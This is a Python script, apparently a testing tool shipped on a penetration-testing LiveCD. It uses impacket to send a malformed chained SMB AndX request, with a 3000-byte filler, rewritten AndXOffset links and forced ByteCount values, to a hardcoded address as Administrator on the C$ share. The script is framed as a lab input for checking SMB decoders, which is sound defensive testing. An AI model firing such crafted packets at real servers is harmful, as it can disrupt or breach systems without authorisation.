/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / bin / crapchain.py < prev    next >
Text File  |  2006-05-22  |  3KB  |  75 lines

  1. from impacket import smb
  2. import os
  3.  
class lotsSMB(smb.SMB):
    """SMB client subclass that emits one hand-built chained AndX request.

    Demo/test harness: session setup, tree connect, open and read are packed
    into a single packet, with a filler block placed inside the chain and
    ByteCount values overwritten by hand. As a lab input it shows why an SMB
    server, proxy or IDS decoder has to treat AndXOffset and ByteCount as
    untrusted and bounds-check both against the bytes actually received.
    """

    def do_lots(self, user, pwd_ansi, share, filename, domain=''):
        """Send the chained request and read (then discard) one reply.

        Args:
            user: account name placed in the session setup data.
            pwd_ansi: value sent as the ANSI password; its length is also
                written to AnsiPwdLength.
            share: path placed in the tree connect request.
            filename: name placed in the open request.
            domain: primary domain string; defaults to empty.

        Returns:
            None. The reply from recvSMB() is neither inspected nor returned.
        """
        packet = smb.NewSMBPacket()
        # NOTE(review): 0x08 looks like the caseless-pathnames header flag;
        # confirm against the smb module's flag constants.
        packet['Flags1'] = 8

        # --- session setup -------------------------------------------------
        session_setup = smb.SMBCommand(self.SMB_COM_SESSION_SETUP_ANDX)
        session_setup['Parameters'] = smb.SMBSessionSetupAndX_Parameters()
        session_setup['Data'] = smb.SMBSessionSetupAndX_Data()

        setup_params = session_setup['Parameters']
        setup_params['MaxBuffer'] = 65535
        setup_params['MaxMpxCount'] = 2
        # NOTE(review): VcNumber is a 16-bit field in the SMB session setup
        # request, while os.getpid() can exceed 65535 on current systems;
        # confirm how the library packs this value.
        setup_params['VCNumber'] = os.getpid()
        setup_params['SessionKey'] = self.get_session_key()
        setup_params['AnsiPwdLength'] = len(pwd_ansi)
        setup_params['UnicodePwdLength'] = len('')
        setup_params['Capabilities'] = self.CAP_RAW_MODE

        setup_data = session_setup['Data']
        setup_data['AnsiPwd'] = pwd_ansi
        setup_data['UnicodePwd'] = ''
        setup_data['Account'] = str(user)
        setup_data['PrimaryDomain'] = str(domain)
        setup_data['NativeOS'] = str(os.name)
        setup_data['NativeLanMan'] = 'pysmb'

        # --- tree connect (chained ANDX command) ---------------------------
        tree_connect = smb.SMBCommand(self.SMB_COM_TREE_CONNECT_ANDX)
        tree_connect['Parameters'] = smb.SMBTreeConnectAndX_Parameters()
        tree_connect['Data'] = smb.SMBTreeConnectAndX_Data()
        tree_connect['Parameters']['PasswordLength'] = 1
        tree_data = tree_connect['Data']
        tree_data['Password'] = '\x00'
        tree_data['Path'] = share
        tree_data['Service'] = smb.SERVICE_ANY

        # --- open ----------------------------------------------------------
        open_file = smb.SMBCommand(self.SMB_COM_OPEN_ANDX)
        open_file['Parameters'] = smb.SMBOpenAndX_Parameters()
        open_params = open_file['Parameters']
        open_params['DesiredAccess'] = smb.SMB_ACCESS_READ
        open_params['OpenMode'] = smb.SMB_O_OPEN
        open_params['SearchAttributes'] = 0
        open_file['Data'] = smb.SMBOpenAndX_Data()
        open_file['Data']['FileName'] = filename

        # --- read ----------------------------------------------------------
        # Fid is a literal 0: no handle from an open reply exists yet when
        # the packet is built.
        read_andx = smb.SMBCommand(self.SMB_COM_READ_ANDX)
        read_andx['Parameters'] = smb.SMBReadAndX_Parameters()
        read_params = read_andx['Parameters']
        read_params['Offset'] = 0
        read_params['Fid'] = 0
        read_params['MaxCount'] = 4000

        # --- filler --------------------------------------------------------
        # Command code 0 carrying 3000 bytes of 'A'; it is appended between
        # the session setup and the tree connect.
        filler = smb.SMBCommand(0)
        filler['Parameters'] = smb.SMBAndXCommand_Parameters()
        filler['Data'] = 'A'*3000

        # Append order is significant and must stay as is.
        for command in (session_setup, filler, tree_connect, open_file, read_andx):
            packet.addCommand(command)

        # Presumably addCommand() fills in the previous command's
        # AndXCommand/AndXOffset as each command is appended (confirm in
        # NewSMBPacket). If so, copying the filler's link fields makes the
        # session setup point past the filler, straight at the tree connect,
        # while the filler bytes stay in the packet.
        session_setup['Parameters']['AndXCommand'] = filler['Parameters']['AndXCommand']
        session_setup['Parameters']['AndXOffset'] = filler['Parameters']['AndXOffset']

        # ByteCount is forced to fixed values rather than derived from the
        # data that was set above.
        session_setup['ByteCount'] = 1000
        tree_connect['ByteCount'] = 100

        self.sendSMB(packet)

        # One reply is read off the connection and dropped.
        self.recvSMB()
  71.  
# Script entry: runs as soon as the file is executed or imported.
# The remote name, the RFC 1918 address, the account and the password are
# literals in the script rather than arguments.
# Presumably the smb.SMB constructor opens the connection - confirm.
s = lotsSMB('*SMBSERVER', '192.168.1.1')
s.do_lots(
    'Administrator',
    'password',
    share=r'\\*SMBSERVER\C$',
    filename=r'\gera',
)
  74.  
  75.